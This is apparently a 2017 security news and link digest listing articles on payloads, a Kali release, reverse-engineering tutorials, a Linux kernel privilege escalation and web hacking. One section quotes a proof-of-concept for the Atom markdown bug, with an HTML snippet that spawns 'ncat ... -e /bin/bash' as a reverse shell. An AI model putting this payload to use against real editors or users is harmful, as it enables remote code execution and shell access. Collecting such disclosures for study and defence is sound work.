Keying Payloads for Scripting Languages
https://adapt-and-attack.com/2017/11/15/keying-payloads-for-noscripting-languages/

🔗 imba.io


Imba is a new programming language for the web that compiles to highly performant and readable JavaScript. It has language level support for defining, extending, subclassing, instantiating and rendering dom nodes. For a simple application like TodoMVC, it is more than 10 times faster than React with less code, and a much smaller library.

Kali Linux 2017.3 Release
https://www.kali.org/releases/kali-linux-2017-3-release/

From Markdown to RCE in Atom
https://statuscode.ch/2017/11/from-markdown-to-rce-in-atom/

*XSS via different extensions
*SSI in IIS
*RCE in IIS

https://mike-n1.github.io/ExtensionsOverview

XSS -> RCE in Atom,

Get a shell when rendering the markdown


demo.md:

<iframe src="/home/user/demo.html">

demo.html:

<noscript> window.top.require('child_process').execFile('/usr/bin/xterm',['-e', 'ncat 127.0.0.1 4242 -e /bin/bash']); </noscript>

Learn Android Security
https://androidtamer.com/learn_android_security

The Art of Fuzzing – Slides and Demos
https://sec-consult.com/en/blog/2017/11/the-art-of-fuzzing-slides-and-demos/index.html

Introduction of CSTI vulnerability


https://speakerdeck.com/shikarisenpai/csti-for-dummies

#tutorial
Reverse Engineering Malware 101 by Amanda Rousseau

https://securedorg.github.io/RE101/

#tutorial
Reverse Engineering Malware 102 by Amanda Rousseau



https://securedorg.github.io/RE102/

#tutorial

Reverse Engineering with libc functions in the GDB (beginner)


https://github.com/raminfp/Reverse_Engineering_For_Beginners

Linux kernel XFRM privilege escalation

https://github.com/torvalds/linux/commit/1137b5e2529a8f5ca8ee709288ecba3e68044df2


http://seclists.org/fulldisclosure/2017/Nov/40

x64 Egg hunting in Linux systems

https://pentesterslife.blog/2017/11/24/x64-egg-hunting-in-linux-systems

How I Hacked 40 Websites in 7 minutes – Hacker Noon
https://hackernoon.com/how-i-hacked-40-websites-in-7-minutes-5b4c28bc8824